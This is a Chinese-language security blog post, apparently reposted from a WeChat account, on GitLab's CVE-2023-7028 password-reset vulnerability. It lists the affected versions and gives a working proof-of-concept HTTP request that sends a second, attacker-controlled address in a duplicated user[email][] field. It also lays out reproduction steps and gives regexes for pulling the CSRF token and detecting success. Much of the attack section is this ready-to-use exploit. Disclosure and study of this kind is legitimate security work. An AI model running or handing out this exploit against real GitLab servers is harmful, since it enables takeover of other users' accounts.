GitLab任意用户密码重置漏洞(CVE-2023-7028)

admin 2024年1月13日16:30:25评论43 views字数 1071阅读3分34秒阅读模式

结论:

指尖好久不更新漏洞相关文章了,看大家都在发,跟个风。

先说结论:需要知道正确的Email(可配合其它历史漏洞获得),危害有限。

漏洞描述: 

2024年1月11日,Gitlab官方披露CVE-2023-7028 GitLab 任意用户密码重置漏洞,官方评级严重。攻击者可利用忘记密码功能,构造恶意请求获取密码重置链接从而重置密码。

影响范围:

  • 16.1 <= Gitlab < 16.1.6

  • 16.2 <= Gitlab < 16.2.9

  • 16.3 <= Gitlab < 16.3.7

  • 16.4 <= Gitlab < 16.4.5

  • 16.5 <= Gitlab < 16.5.6

  • 16.6 <= Gitlab < 16.6.4

  • 16.7 <= Gitlab < 16.7.2

POC:

POST /users/password HTTP/1.1Host: 127.0.0.1Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Content-Type: application/x-www-form-urlencodedUpgrade-Insecure-Requests: 1Referer: http://127.0.0.1/users/password/newutf8=%E2%9C%93&authenticity_token=FTrmXyR%2FlOn8sxS4ZDVxLaLP20Fjx8fen7LatJOmuaoXClS8DtT6Uskb2uqUNrAHGaFAqmnEVQjx5Go3%2BV1tlA%3D%3D&user[email][]=正确的邮箱&user[email][]=大佬的邮箱 

复现:

1、访问target+/users/password/new,输入邮箱,重置!拦截请求修改请求体中的user[mail]xxx

GitLab任意用户密码重置漏洞(CVE-2023-7028)

<meta name="csrf-token" content="([^"]+)" />  //正则提取csrf-token

2、构造并发送POC中的请求,如果响应体中出现以下正则内容,查看邮箱收信即可。

`如果您的邮箱存在|If your email address exists` //响应检测正则

来源:https://twitter.com/rwincey/status/1745659710089437368

原文始发于微信公众号(指尖安全):GitLab任意用户密码重置漏洞(CVE-2023-7028)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月13日16:30:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   GitLab任意用户密码重置漏洞(CVE-2023-7028)http://cn-sec.com/archives/2387995.html

发表评论

匿名网友 填写信息